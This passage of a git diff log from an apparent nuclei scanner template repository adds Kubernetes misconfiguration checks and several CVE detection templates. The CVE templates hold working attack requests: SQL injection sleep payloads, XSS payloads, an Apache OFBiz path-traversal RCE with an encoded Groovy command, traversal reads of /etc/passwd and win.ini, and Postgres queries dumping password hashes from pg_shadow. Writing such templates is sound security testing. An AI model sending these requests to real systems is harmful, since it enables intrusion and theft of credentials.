4a0a0047304502203a66813cc15b12b1260c6862926c6748694a84bc66c9ca24dff7052f998b5aaf022100ef69cce9aba0cb47d58dd0bc916ee54f02a32632a4749e98e7a22e3b92da0e8d:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/deployments/k8s-root-container-admission.yaml b/cloud/kubernetes/deployments/k8s-root-container-admission.yaml index 65f2b0b327..6dedcd1369 100644 --- a/cloud/kubernetes/deployments/k8s-root-container-admission.yaml +++ b/cloud/kubernetes/deployments/k8s-root-container-admission.yaml @@ -45,4 +45,4 @@ javascript: - type: dsl dsl: - response -# digest: 4a0a0047304502200475eac5bae9aa7fe9c98e0a90aa3680da94db7a15515256680d16a9fa319f8d022100b70835b10aa49e8a2961b2d957e41cc8e37f64cd066f36e292eb681900c19133:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file +# digest: 4a0a0047304502203296d04807538e04f058f6bbf7241e04ed2bf22ece4282aca6a268d9463a86cf022100abe93bb221464d568cbeb7cf07d382ea36e6987e9dca958912f6231b6c4e2cdf:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/network-policies/k8s-def-egress-rules.yaml b/cloud/kubernetes/network-policies/k8s-def-egress-rules.yaml new file mode 100644 index 0000000000..e6c88c2c1d --- /dev/null +++ b/cloud/kubernetes/network-policies/k8s-def-egress-rules.yaml @@ -0,0 +1,48 @@ +id: k8s-def-egress-rules + +info: + name: Ensure egress rules are defined + author: princechaddha + severity: medium + description: Checks for network policies that define specific egress rules, ensuring controlled outbound traffic. + impact: | + Lack of egress rules in network policies may allow unrestricted outbound network traffic. This can lead to potential security risks, including data exfiltration. + remediation: | + Define egress rules in the network policy to manage and restrict outbound traffic effectively. Specify allowed destinations and ports to limit network traffic. + reference: + - https://kubernetes.io/docs/concepts/services-networking/network-policies/ + tags: cloud,devops,kubernetes,security,devsecops,network + +flow: | + code(1); + for (let policy of template.items) { + set("policy", policy) + javascript(1); + } + +self-contained: true +code: + - engine: + - sh + - bash + source: kubectl get networkpolicies --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[] | {name: .metadata.name, namespace: .metadata.namespace, egress: .spec.egress}' + +javascript: + - code: | + let policyData = template.policy; + if (!policyData.egress || policyData.egress.length === 0) { + let result = `Network policy '${policyData.name}' in namespace '${policyData.namespace}' does not define any egress rules.`; + Export(result); + } + + extractors: + - type: dsl + dsl: + - response +# digest: 490a0046304402203da66eea889668b34e537e161930c32db95c287c91bf4b25ea42fab9207aa20b022066509c25e5056f4f842cc9720a481689aaf3c3208c6f91ce5dd051819e0325a6:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/network-policies/k8s-network-ingress-rules.yaml b/cloud/kubernetes/network-policies/k8s-network-ingress-rules.yaml new file mode 100644 index 0000000000..77a341ebdb --- /dev/null +++ b/cloud/kubernetes/network-policies/k8s-network-ingress-rules.yaml @@ -0,0 +1,47 @@ +id: k8s-network-ingress-rules + +info: + name: Network policies define ingress + author: princechaddha + severity: medium + description: Ensures network policies define ingress rules to control traffic flow within the cluster, enhancing security. + impact: | + Without defined ingress rules, network policies might allow unrestricted inbound traffic, potentially exposing the cluster to security threats. Properly defined ingress rules help mitigate this risk by restricting traffic flow. + remediation: Define ingress rules in network policies to restrict and control inbound traffic within the Kubernetes cluster. + reference: + - https://kubernetes.io/docs/concepts/services-networking/network-policies/ + tags: cloud,devops,kubernetes,security,devsecops,networking + +flow: | + code(1); + for (let networkPolicy of template.items) { + set("networkPolicy", networkPolicy) + javascript(1); + } + +self-contained: true +code: + - engine: + - sh + - bash + source: kubectl get networkpolicies --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[]' + +javascript: + - code: | + let networkPolicy = JSON.parse(template.networkPolicy); + if (!networkPolicy.spec.ingress || networkPolicy.spec.ingress.length === 0) { + let result = (`Network policy '${networkPolicy.metadata.name}' in namespace '${networkPolicy.metadata.namespace}' does not define any ingress rules.`); + Export(result); + } + + extractors: + - type: dsl + dsl: + - response +# digest: 4a0a00473045022100c53e3615f3c1dd115d8efd4e9415177289e366c07ee24d4694d19c882c77044102203ce3bd2c002e4ab82073e7c770d39298407a1c40246b5c657104d01b4f642f6a:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/network-policies/k8s-ns-policy-set.yaml b/cloud/kubernetes/network-policies/k8s-ns-policy-set.yaml new file mode 100644 index 0000000000..4e11702e52 --- /dev/null +++ b/cloud/kubernetes/network-policies/k8s-ns-policy-set.yaml @@ -0,0 +1,55 @@ +id: k8s-ns-policy-set + +info: + name: Network policies specify namespace + author: princechaddha + severity: medium + description: Checks for Kubernetes network policies that do not specify a namespace, potentially leading to misconfigurations and security risks. + impact: | + Failure to specify a namespace in network policies can cause the policies to not be enforced as expected, leading to potential security vulnerabilities where unauthorized traffic could be allowed. + remediation: | + Ensure that all network policies explicitly define the namespace they apply to. This helps in enforcing security boundaries and preventing cross-namespace traffic unless explicitly allowed. + reference: + - https://kubernetes.io/docs/concepts/services-networking/network-policies/ + tags: cloud,devops,kubernetes,security,devsecops,networking + +flow: | + code(1); + for (let policy of template.items) { + set("policy", policy) + javascript(1); + } + +self-contained: true +code: + - engine: + - sh + - bash + source: kubectl get networkpolicies --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[] | {policy: .metadata.name, namespace: .metadata.namespace}' + +javascript: + - code: | + if (template.items.length === 0) { + log(template.items.length) + Export('No network policies found. Ensure that network policies are defined and namespaces are specified.'); + } else { + template.items.forEach(policy => { + let policyData = JSON.parse(policy); + if (!policyData.namespace) { + let result = (`Network Policy '${policyData.policy}' does not specify a namespace.`); + Export(result); + } + }); + } + + extractors: + - type: dsl + dsl: + - response +# digest: 4a0a0047304502204f78530d043f4ee9c2844ef6ea271cdee74ef99154f17f43f120ff4cad1ff417022100dc262780f80d0e64648e5fa555c35032837ae0ecd21c274df318d593c2a1a626:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/pods/k8s-allow-privilege-escalation-set.yaml b/cloud/kubernetes/pods/k8s-allow-privilege-escalation-set.yaml index e45a1030af..cde9f87928 100644 --- a/cloud/kubernetes/pods/k8s-allow-privilege-escalation-set.yaml +++ b/cloud/kubernetes/pods/k8s-allow-privilege-escalation-set.yaml @@ -47,4 +47,4 @@ javascript: - type: dsl dsl: - response -# digest: 4a0a00473045022025dc0e9a5d93ac04821b70467991a867158ff37e94f154ac26b67c9ebfaf6bdd02210094dde6b68d08983ae386767c31909fb6aa2a8edc5f257b81309eda1d5b0b0bb9:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file +# digest: 490a00463044022022d7414cae87fa28332a6a123d954251d677ec6d3900d9695773585fa2659b1c02200c516a4fac6f46fc00bea745add53ff77b6f95557fceb66c8227ba2d1771ea45:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/pods/k8s-containers-share-host-ipc.yaml b/cloud/kubernetes/pods/k8s-containers-share-host-ipc.yaml index d33d13d18a..ead59c806a 100644 --- a/cloud/kubernetes/pods/k8s-containers-share-host-ipc.yaml +++ b/cloud/kubernetes/pods/k8s-containers-share-host-ipc.yaml @@ -44,4 +44,4 @@ javascript: - type: dsl dsl: - response -# digest: 4a0a00473045022100a9730fb29a79c4eb4576ddb1000e7a07cce3aa571fc20f8985265f114f5072ad02207a866c1c532b29932da349c0e29fb008675438fb327c0dab1620893ccf009ff7:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file +# digest: 4b0a00483046022100cc2146147ae70fb4bfc9d107d68d692ac4a287dfdaebfb356b425af0761eda00022100a8262c6003997d011ca625ceb8c1f8cc5e245c64c7306870001756811b39889b:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/pods/k8s-host-network-namespace-shared.yaml b/cloud/kubernetes/pods/k8s-host-network-namespace-shared.yaml index 6564d3b93f..a98680cc00 100644 --- a/cloud/kubernetes/pods/k8s-host-network-namespace-shared.yaml +++ b/cloud/kubernetes/pods/k8s-host-network-namespace-shared.yaml @@ -44,4 +44,4 @@ javascript: - type: dsl dsl: - response -# digest: 4b0a004830460221008eef4a8e8215cf69d36f0d94aa83b3531ce19730942b461b27842147f7f39973022100dfc800230845da0fe800dac62b006dc4a27d52a9b1684e7153165782e7d3472b:366f2a24c8eb519f6968bd8801c08ebe +# digest: 4b0a00483046022100e21998047fdf04b608359872be3fd0d5767bb0a3f6a7f8c66547c2ab9943fdfc02210089231ef6e0d74220e0fa8e2cfc7eec254e48299d53bfb4abe2891748a2e3187f:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/pods/k8s-host-pid-namespace-sharing.yaml b/cloud/kubernetes/pods/k8s-host-pid-namespace-sharing.yaml index 60922965d0..e9386f6075 100644 --- a/cloud/kubernetes/pods/k8s-host-pid-namespace-sharing.yaml +++ b/cloud/kubernetes/pods/k8s-host-pid-namespace-sharing.yaml @@ -44,4 +44,4 @@ javascript: - type: dsl dsl: - response -# digest: 4b0a00483046022100cdb3127b175107266c1409c70c3318a851490bf743f92923077b0249b9090cdd022100d3371724828565a28e7003ecf9902e3deb93c074444b7a9b2d34c235f454032c:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file +# digest: 4a0a0047304502202982af00e2f77f8a8d34d3a60faa749adcc4621fcaa816c2f19f4f6fa109ef8a022100d768ba6500983f601db45742b46b488b4efee0e2e15389034b0000c2667b67d2:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/pods/k8s-readonly-fs.yaml b/cloud/kubernetes/pods/k8s-readonly-fs.yaml index 947aa40f31..520aeb5a84 100644 --- a/cloud/kubernetes/pods/k8s-readonly-fs.yaml +++ b/cloud/kubernetes/pods/k8s-readonly-fs.yaml @@ -44,3 +44,4 @@ javascript: - type: dsl dsl: - response +# digest: 4a0a00473045022100822332f29c05236643aceb706c563112c463a6fdda5a60f391aaec1308fa9e3902207c8e95c0302c1f6f85c9a8e43e719b3e52c67684e4b5806e4e9ec0c44e1bfb20:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/pods/k8s-readonly-rootfs.yaml b/cloud/kubernetes/pods/k8s-readonly-rootfs.yaml new file mode 100644 index 0000000000..2937a1f1b1 --- /dev/null +++ b/cloud/kubernetes/pods/k8s-readonly-rootfs.yaml @@ -0,0 +1,50 @@ +id: k8s-readonly-rootfs + +info: + name: Pods with read-only root filesystem + author: princechaddha + severity: medium + description: Checks for pods and containers running with a read-only root filesystem to prevent modifications to the filesystem, enhancing security. + impact: | + Running containers with a read-only root filesystem ensures that applications are not able to write to the filesystem or modify existing content. This is a common security practice to prevent malicious changes. + remediation: | + Configure all pods and containers to have their root filesystem set to read-only mode. This can be achieved by setting the securityContext.readOnlyRootFilesystem parameter to true in the pod or container configuration. + reference: + - https://kubernetes.io/docs/concepts/policy/pod-security-policy/#volumes-and-file-systems + tags: cloud,devops,kubernetes,security,devsecops,pods,k8s + +flow: | + code(1); + for (let pod of template.items) { + set("pod", pod) + javascript(1); + } + +self-contained: true +code: + - engine: + - sh + - bash + source: kubectl get pods --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[] | {pod: .metadata.name, containers: .spec.containers}' + +javascript: + - code: | + let podData = JSON.parse(template.pod); + podData.containers.forEach(container => { + if (container.securityContext && container.securityContext.readOnlyRootFilesystem !== true) { + let result = (`Container '${container.name}' in pod '${podData.pod}' is not running with a read-only root filesystem.`); + Export(result); + } + }); + + extractors: + - type: dsl + dsl: + - response +# digest: 490a0046304402205ca1449c5ae245df848df2d8b4117966ed8fc276841e0132e2844c643179f4c9022056438a03c5cb5402b1d07b3d1d88f123559df889348d5605c01ce0aedbedaf47:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/pods/k8s-root-user-id.yaml b/cloud/kubernetes/pods/k8s-root-user-id.yaml new file mode 100644 index 0000000000..24185e320b --- /dev/null +++ b/cloud/kubernetes/pods/k8s-root-user-id.yaml @@ -0,0 +1,49 @@ +id: k8s-root-user-id + +info: + name: Pods run with root user ID + author: princechaddha + severity: low + description: Checks for pods running with the user ID of the root user, increasing security risks. + impact: | + Running pods with the root user ID can allow malicious entities to gain unnecessary privileges, leading to potential compromises in the Kubernetes environment. + remediation: Configure pods to run with a non-root user ID by setting the 'securityContext' for each container and the pod itself. + reference: + - https://kubernetes.io/docs/tasks/configure-pod-container/security-context/ + tags: cloud,devops,kubernetes,security,devsecops,pods + +flow: | + code(1); + for (let pod of template.items) { + set("pod", pod) + javascript(1); + } + +self-contained: true +code: + - engine: + - sh + - bash + source: kubectl get pods --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[] | {pod: .metadata.name, containers: .spec.containers}' + +javascript: + - code: | + let podData = JSON.parse(template.pod); + podData.containers.forEach(container => { + if (container.securityContext && container.securityContext.runAsUser === 0) { + let result = (`Container '${container.name}' in pod '${podData.pod}' is running with root user ID.`); + Export(result); + } + }); + + extractors: + - type: dsl + dsl: + - response +# digest: 4a0a00473045022100c1eee5714a5bba3549ccef97ba37cc178ad76f7786c90732ff49d211d1d4153802204dae0cd7ef2c634e85d3d27a7feb5c9508f4066a91f7ef56f861ed86af5bb420:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file From 9ae356534768d515fe70a3f2da22740f196d82e7 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 14 Jun 2024 17:29:39 +0530 Subject: [PATCH 0213/1841] minor update --- http/cves/2024/CVE-2024-3552.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-3552.yaml b/http/cves/2024/CVE-2024-3552.yaml index f28018f4c9..31697d649c 100644 --- a/http/cves/2024/CVE-2024-3552.yaml +++ b/http/cves/2024/CVE-2024-3552.yaml @@ -21,12 +21,12 @@ http: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - action=w2dc_get_map_marker_info&locations_ids[]=(select+if(1=1,sleep(4),0)+from+(select+1)x) + action=w2dc_get_map_marker_info&locations_ids[]=(select+if(1=1,sleep(6),0)+from+(select+1)x) matchers: - type: dsl dsl: - - 'duration>=4' + - 'duration>=6' - 'contains(body, "[]")' - 'status_code == 200' condition: and From 54142c9eb1f0d8013bc94aaa24304188d64e4aa0 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 14 Jun 2024 19:07:34 +0530 Subject: [PATCH 0214/1841] updated payloads --- dast/vulnerabilities/xss/reflected-xss.yaml | 16 ++++------------ 1 file changed, 4 insertions(+), 12 deletions(-) diff --git a/dast/vulnerabilities/xss/reflected-xss.yaml b/dast/vulnerabilities/xss/reflected-xss.yaml index 291839a4ca..b0cae4deb0 100644 --- a/dast/vulnerabilities/xss/reflected-xss.yaml +++ b/dast/vulnerabilities/xss/reflected-xss.yaml @@ -19,17 +19,9 @@ http: payloads: reflection: - - "'\"><{{first}}" - - "" - - "" - - "'>" - - "" - - "" - - "" - - "" - - "'>" - - "'\">" - - "'%3e%3cscript%3ealert({{first}}*{{first}})%3c%2fscript%3eejj4sbx5w4o" + - "'\"><{{first}}>" + - "'><{{first}}>" + - "\"><{{first}}>" fuzzing: - part: query @@ -49,4 +41,4 @@ http: - type: word part: header words: - - "text/html" \ No newline at end of file + - "text/html" From eaf21cf81136b0c082725ee61b43c46d6ecbba50 Mon Sep 17 00:00:00 2001 From: Mzack9999 Date: Fri, 14 Jun 2024 16:56:22 +0200 Subject: [PATCH 0215/1841] adding service detection to pg templates --- javascript/enumeration/pgsql/pgsql-default-db.yaml | 6 +++++- javascript/enumeration/pgsql/pgsql-file-read.yaml | 6 +++++- javascript/enumeration/pgsql/pgsql-list-database.yaml | 6 +++++- .../enumeration/pgsql/pgsql-list-password-hashes.yaml | 6 +++++- javascript/enumeration/pgsql/pgsql-list-users.yaml | 6 +++++- javascript/enumeration/pgsql/pgsql-version-detect.yaml | 6 +++++- 6 files changed, 30 insertions(+), 6 deletions(-) diff --git a/javascript/enumeration/pgsql/pgsql-default-db.yaml b/javascript/enumeration/pgsql/pgsql-default-db.yaml index a0f64ad65e..abc05d2f53 100644 --- a/javascript/enumeration/pgsql/pgsql-default-db.yaml +++ b/javascript/enumeration/pgsql/pgsql-default-db.yaml @@ -14,7 +14,11 @@ info: shodan-query: "product:\"PostgreSQL\"" tags: js,network,postgresql,authenticated,enum javascript: - - code: | + - pre-condition: | + var m = require("nuclei/postgres"); + var c = m.PGClient(); + c.IsPostgres(Host, Port); + code: | const postgres = require('nuclei/postgres'); const client = new postgres.PGClient; connected = client.ConnectWithDB(Host, Port, User, Pass, Db); diff --git a/javascript/enumeration/pgsql/pgsql-file-read.yaml b/javascript/enumeration/pgsql/pgsql-file-read.yaml index 8a7f96f012..e77c1dcdbe 100644 --- a/javascript/enumeration/pgsql/pgsql-file-read.yaml +++ b/javascript/enumeration/pgsql/pgsql-file-read.yaml @@ -14,7 +14,11 @@ info: shodan-query: "product:\"PostgreSQL\"" tags: js,network,postgresql,authenticated,enum javascript: - - code: | + - pre-condition: | + var m = require("nuclei/postgres"); + var c = m.PGClient(); + c.IsPostgres(Host, Port); + code: | const postgres = require('nuclei/postgres'); const client = new postgres.PGClient; connected = client.ExecuteQuery(Host, Port, User, Pass, Db, "select pg_ls_dir('./');"); diff --git a/javascript/enumeration/pgsql/pgsql-list-database.yaml b/javascript/enumeration/pgsql/pgsql-list-database.yaml index d6f1bde551..a8a8c0b690 100644 --- a/javascript/enumeration/pgsql/pgsql-list-database.yaml +++ b/javascript/enumeration/pgsql/pgsql-list-database.yaml @@ -15,7 +15,11 @@ info: shodan-query: "product:\"PostgreSQL\"" tags: js,network,postgresql,authenticated,enum javascript: - - code: | + - pre-condition: | + var m = require("nuclei/postgres"); + var c = m.PGClient(); + c.IsPostgres(Host, Port); + code: | const postgres = require('nuclei/postgres'); const client = new postgres.PGClient; connected = client.ExecuteQuery(Host, Port, User, Pass, Db, "SELECT datname FROM pg_database"); diff --git a/javascript/enumeration/pgsql/pgsql-list-password-hashes.yaml b/javascript/enumeration/pgsql/pgsql-list-password-hashes.yaml index c665db8bc4..6a9aa5d455 100644 --- a/javascript/enumeration/pgsql/pgsql-list-password-hashes.yaml +++ b/javascript/enumeration/pgsql/pgsql-list-password-hashes.yaml @@ -16,7 +16,11 @@ info: shodan-query: "product:\"PostgreSQL\"" tags: js,network,postgresql,authenticated,enum javascript: - - code: | + - pre-condition: | + var m = require("nuclei/postgres"); + var c = m.PGClient(); + c.IsPostgres(Host, Port); + code: | const postgres = require('nuclei/postgres'); const client = new postgres.PGClient; connected = client.ExecuteQuery(Host, Port, User, Pass, Db, "SELECT usename, passwd FROM pg_shadow"); diff --git a/javascript/enumeration/pgsql/pgsql-list-users.yaml b/javascript/enumeration/pgsql/pgsql-list-users.yaml index 63150b7589..e679facdb7 100644 --- a/javascript/enumeration/pgsql/pgsql-list-users.yaml +++ b/javascript/enumeration/pgsql/pgsql-list-users.yaml @@ -14,7 +14,11 @@ info: shodan-query: "product:\"PostgreSQL\"" tags: js,network,postgresql,enum,authenticated javascript: - - code: | + - pre-condition: | + var m = require("nuclei/postgres"); + var c = m.PGClient(); + c.IsPostgres(Host, Port); + code: | const postgres = require('nuclei/postgres'); const client = new postgres.PGClient; connected = client.ExecuteQuery(Host, Port, User, Pass, Db, "SELECT usename FROM pg_user"); diff --git a/javascript/enumeration/pgsql/pgsql-version-detect.yaml b/javascript/enumeration/pgsql/pgsql-version-detect.yaml index b0185935f9..54f7c25094 100644 --- a/javascript/enumeration/pgsql/pgsql-version-detect.yaml +++ b/javascript/enumeration/pgsql/pgsql-version-detect.yaml @@ -14,7 +14,11 @@ info: shodan-query: "product:\"PostgreSQL\"" tags: js,network,postgresql,enum,authenticated javascript: - - code: | + - pre-condition: | + var m = require("nuclei/postgres"); + var c = m.PGClient(); + c.IsPostgres(Host, Port); + code: | const postgres = require('nuclei/postgres'); const client = new postgres.PGClient; connected = client.ExecuteQuery(Host, Port, User, Pass, Db, "select version();"); From 9854f6e508c5d442dac87ddce4dca20818349ffc Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 14 Jun 2024 21:56:31 +0530 Subject: [PATCH 0216/1841] Create CVE-2024-32113.yaml --- http/cves/2024/CVE-2024-32113.yaml | 45 ++++++++++++++++++++++++++++++ 1 file changed, 45 insertions(+) create mode 100644 http/cves/2024/CVE-2024-32113.yaml diff --git a/http/cves/2024/CVE-2024-32113.yaml b/http/cves/2024/CVE-2024-32113.yaml new file mode 100644 index 0000000000..62f1fe1c82 --- /dev/null +++ b/http/cves/2024/CVE-2024-32113.yaml @@ -0,0 +1,45 @@ +id: CVE-2024-32113 + +info: + name: Apache OFBiz Directory Traversal - Remote Code Execution + author: DhiyaneshDK + severity: high + description: | + Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Apache OFBiz.This issue affects Apache OFBiz: before 18.12.13 + remediation: Users are recommended to upgrade to version 18.12.13, which fixes the issue. + reference: + - https://issues.apache.org/jira/browse/OFBIZ-13006 + - https://lists.apache.org/thread/w6s60okgkxp2th1sr8vx0ndmgk68fqrd + - https://ofbiz.apache.org/download.html + - https://ofbiz.apache.org/security.html + - https://github.com/absholi7ly/Apache-OFBiz-Directory-Traversal-exploit + classification: + epss-score: 0.00115 + epss-percentile: 0.45112 + metadata: + verified: true + max-request: 1 + fofa-query: app="Apache_OFBiz" + tags: cve,cve2024,apache,obiz,rce + +http: + - raw: + - | + POST /webtools/control/forgotPassword/%2e/%2e/ProgramExport HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + groovyProgram=%74%68%72%6f%77%20%6e%65%77%20%45%78%63%65%70%74%69%6f%6e(%27%69%64%27.%65%78%65%63%75%74%65().%74%65%78%74); + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "java.lang.Exceptio:" + - "uid=([0-9(a-z-)]+) gid=([0-9(a-z-)]+) groups=([0-9(a-z-)]+)" + condition: and + + - type: status + status: + - 200 From 22bc97b275aded5f2cd0ade240ace3fbeae4db9e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 14 Jun 2024 21:58:12 +0530 Subject: [PATCH 0217/1841] fix typo --- http/cves/2024/CVE-2024-32113.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-32113.yaml b/http/cves/2024/CVE-2024-32113.yaml index 62f1fe1c82..87417f7f4a 100644 --- a/http/cves/2024/CVE-2024-32113.yaml +++ b/http/cves/2024/CVE-2024-32113.yaml @@ -36,7 +36,7 @@ http: - type: regex part: body regex: - - "java.lang.Exceptio:" + - "java.lang.Exception:" - "uid=([0-9(a-z-)]+) gid=([0-9(a-z-)]+) groups=([0-9(a-z-)]+)" condition: and From 64a8b3cc12f358d9159cf3a3054dfd822991d5cb Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 14 Jun 2024 22:15:41 +0530 Subject: [PATCH 0218/1841] fixed & working --- http/cves/2024/CVE-2024-28995.yaml | 43 +++++++++++++++++------------- 1 file changed, 24 insertions(+), 19 deletions(-) diff --git a/http/cves/2024/CVE-2024-28995.yaml b/http/cves/2024/CVE-2024-28995.yaml index fc166b2662..ce5d645122 100644 --- a/http/cves/2024/CVE-2024-28995.yaml +++ b/http/cves/2024/CVE-2024-28995.yaml @@ -1,6 +1,5 @@ id: CVE-2024-28995 - info: name: SolarWinds Serv-U - Directory Traversal author: DhiyaneshDK @@ -15,28 +14,34 @@ info: verified: true max-request: 1 shodan-query: html:"Serv-U" - fofa-query: app="Serv-U-FTP" + fofa-query: server="Serv-U" tags: cve,cve2024,lfi,solarwinds,serv-u http: - - method: GET - path: - - '{{BaseURL}}/?InternalDir=/../../../../ProgramData/RhinoSoft/Serv-U/^&InternalFile=Serv-U-StartupLog.txt' - - '{{BaseURL}}/?InternalDir=\..\..\..\..\etc^&InternalFile=passwd' + - raw: + - | + GET /?InternalDir=/../../../../windows&InternalFile=win.ini HTTP/1.1 + Host: {{Hostname}} + + - | + GET /?InternalDir=\..\..\..\..\etc&InternalFile=passwd HTTP/1.1 + Host: {{Hostname}} stop-at-first-match: true - matchers-condition: or + matchers-condition: and matchers: - - type: dsl - dsl: - - "contains(header_1, 'Server: Serv-U')" - - 'contains(body_1, "Serv-U File Server")' - - "status_code_1 == 200" - condition: and + - type: regex + part: body + regex: + - "root:.*:0:0:" + - "\\[(font|extension|file)s\\]" + condition: or - - type: dsl - dsl: - - "contains(header_2, 'Server: Serv-U')" - - "regex('root:.*:0:0:', body_2)" - - "status_code_2 == 200" - condition: and + - type: word + part: header + words: + - "Serv-U" + + - type: status + status: + - 200 From 88eb305bc6eac6ee7ca0c24e8b447eb5b1dd6fea Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 14 Jun 2024 23:01:53 +0530 Subject: [PATCH 0219/1841] Create CVE-2023-51449.yaml (Gradio Hugging Face - Unauthenticated Local File Inclusion) --- http/cves/2023/CVE-2023-51449.yaml | 83 ++++++++++++++++++++++++++++++ 1 file changed, 83 insertions(+) create mode 100644 http/cves/2023/CVE-2023-51449.yaml diff --git a/http/cves/2023/CVE-2023-51449.yaml b/http/cves/2023/CVE-2023-51449.yaml new file mode 100644 index 0000000000..ccc16826fe --- /dev/null +++ b/http/cves/2023/CVE-2023-51449.yaml @@ -0,0 +1,83 @@ +id: CVE-2023-51449 + +info: + name: Gradio Hugging Face - Unauthenticated Local File Inclusion + author: nvn1729 + severity: high + description: | + Gradio LFI when auth is not enabled, affects versions 4.0 - 4.10, also works against Gradio < 3.33 + reference: + - https://github.com/gradio-app/gradio/security/advisories/GHSA-6qm2-wpxq-7qh2 + - https://www.horizon3.ai/attack-research/disclosures/exploiting-file-read-vulnerabilities-in-gradio-to-steal-secrets-from-hugging-face-spaces/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-51449 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2023-51449 + cwe-id: CWE-22 + epss-score: 0.00064 + epss-percentile: 0.27836 + cpe: cpe:2.3:a:gradio_project:gradio:*:*:*:*:*:python:*:* + metadata: + verified: true + max-request: 2 + vendor: gradio_project + product: gradio + framework: python + shodan-query: html="__gradio_mode__" + fofa-query: body="__gradio_mode__" + tags: cve,cve2024,lfi,gradio,unauth,intrusive + +variables: + str: '{{rand_base(8)}}' + +http: + - raw: + - | + POST /upload HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=---------------------------250033711231076532771336998311 + + -----------------------------250033711231076532771336998311 + Content-Disposition: form-data; name="files";filename="okmijnuhbygv" + Content-Type: application/octet-stream + + {{str}} + -----------------------------250033711231076532771336998311-- + + - | + GET /file={{download_path}}{{path}} HTTP/1.1 + Host: {{Hostname}} + + extractors: + - type: regex + part: body + name: download_path + internal: true + group: 1 + regex: + - "\\[\"(.+)okmijnuhbygv\"\\]" + + payloads: + path: + - ..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini + - ../../../../../../../../../../../../../../../etc/passwd + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + - "\\[(font|extension|file)s\\]" + condition: or + + - type: word + part: content_type + words: + - "text/plain" + + - type: status + status: + - 200 From 34762c8da2acc3f660bfc50e73b326f95b42bd5d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 14 Jun 2024 23:11:27 +0530 Subject: [PATCH 0220/1841] Support Both Windows & Linux (Gradio Applications - Local File Read) --- http/cves/2024/CVE-2024-1561.yaml | 65 ++++++++++++++++--------------- 1 file changed, 34 insertions(+), 31 deletions(-) diff --git a/http/cves/2024/CVE-2024-1561.yaml b/http/cves/2024/CVE-2024-1561.yaml index 8efbfcfd40..251ad54ade 100644 --- a/http/cves/2024/CVE-2024-1561.yaml +++ b/http/cves/2024/CVE-2024-1561.yaml @@ -2,7 +2,7 @@ id: CVE-2024-1561 info: name: Gradio Applications - Local File Read - author: Diablo + author: nvn1729,Diablo severity: high description: | Local file read by calling arbitrary methods of Components class @@ -16,6 +16,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2024-1561 - https://github.com/gradio-app/gradio/commit/24a583688046867ca8b8b02959c441818bdb34a2 - https://www.gradio.app/changelog#4-13-0 + - https://www.horizon3.ai/attack-research/disclosures/exploiting-file-read-vulnerabilities-in-gradio-to-steal-secrets-from-hugging-face-spaces/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 @@ -25,50 +26,52 @@ info: epss-percentile: 0.36659 metadata: verified: true - max-request: 3 + max-request: 2 shodan-query: html:"__gradio_mode__" tags: cve,cve2024,intrusive,unauth,gradio,lfi,lfr -flow: http(1) && http(2) && http(3) http: - - raw: - - | - GET /config HTTP/1.1 - Host: {{Hostname}} - - extractors: - - type: json - name: first-component - part: body - group: 1 - json: - - '.components[0].id' - internal: true - - raw: - | POST /component_server HTTP/1.1 Host: {{Hostname}} Content-Type: application/json - {"component_id": "{{first-component}}","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"} + {"component_id": "1", "data": "{{path}}", "fn_name": "move_resource_to_block_cache", 